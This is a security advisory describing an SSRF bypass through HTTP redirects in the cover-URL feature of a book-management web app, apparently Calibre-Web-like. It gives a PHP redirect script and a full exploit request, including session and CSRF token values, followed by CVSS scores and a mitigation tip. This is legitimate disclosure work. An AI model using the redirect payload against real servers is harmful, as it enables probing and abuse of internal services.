9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
37.1%
The SSRF Protection is incomplete and can be bypassed via an HTTP redirect, the python-requests library will follow redirections by default (can be disabled byallow_redirects=False
).
An attacker can set up their HTTP server to respond with a 302 redirect to redirect the request to localhost.
Sample PHP file to reproduce :
//redir.php
<?php
header("Location: http://localhost:9000");
?>
POST /admin/book/1 HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14432334242120559709379867589
Content-Length: 2321
Origin: null
Connection: close
Cookie: session=.eJwljjlqBDEQAP-i2EEf6lZrPzNIfWBjsGFmNzL-uwccVlFB_bSjzrze2-N5vvKtHR_RHs0qZjJR96yaZUwgy0EsCrqJgS60QSTLhDcPBhZzWdRhqMZcIIjqmLHhLntpem1RFew8dUpX9MQ50Rg3aFQAWxF57lyc7R55XXn-3-CNfp11PL8_8-sWPty3EoGbB2YOhF41KPfOSBq9gpRitt8_T24_Fw.YhhiGw.-3BW6pW_7-ch1-BZOwoScsgrPTY; remember_token=1|c03586bceafcfcc3553cf6f7687a8e5568f28f153173472c83b178b3c748a61ffb39953601a75eb9dcc9c91a8fcd3a710feecab8e93530f1781b5734183b391e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="csrf_token"
ImM3Y2NiNjIyMGM4Y2QxZWU3MTA0ZmY3MmViYmVkZTI3NGZkMjYyZDki.YhhiGg.MmwyZBGR24IaeVpO-gVRdjx2vk0
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="book_title"
A Christmas Carol in Prose; Being a Ghost Story of Christmas
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="author_name"
Charles Dickens
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="description"
<p>Test</p>
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="tags"
Christmas stories, Ghost stories, London (England) -- Fiction, Misers -- Fiction, Poor families -- Fiction, Scrooge; Ebenezer (Fictitious character) -- Fiction, Sick children -- Fiction
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="series"
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="series_index"
1.0
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="rating"
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="cover_url"
http://192.168.1.130:8080/redir.php
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="btn-upload-cover"; filename=""
Content-Type: application/octet-stream
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="pubdate"
2004-08-11
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="publisher"
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="languages"
English
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="btn-upload-format"; filename=""
Content-Type: application/octet-stream
-----------------------------14432334242120559709379867589
Content-Disposition: form-data; name="detail_view"
on
-----------------------------14432334242120559709379867589--
This vulnerability is capable of port scanning and even may execute some actions on the victim’s side in case there are sensitive services on localhost.
I recommend using the Advocate library instead of requests, it will protect functionality download the remote files from SSRF attacks.
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
37.1%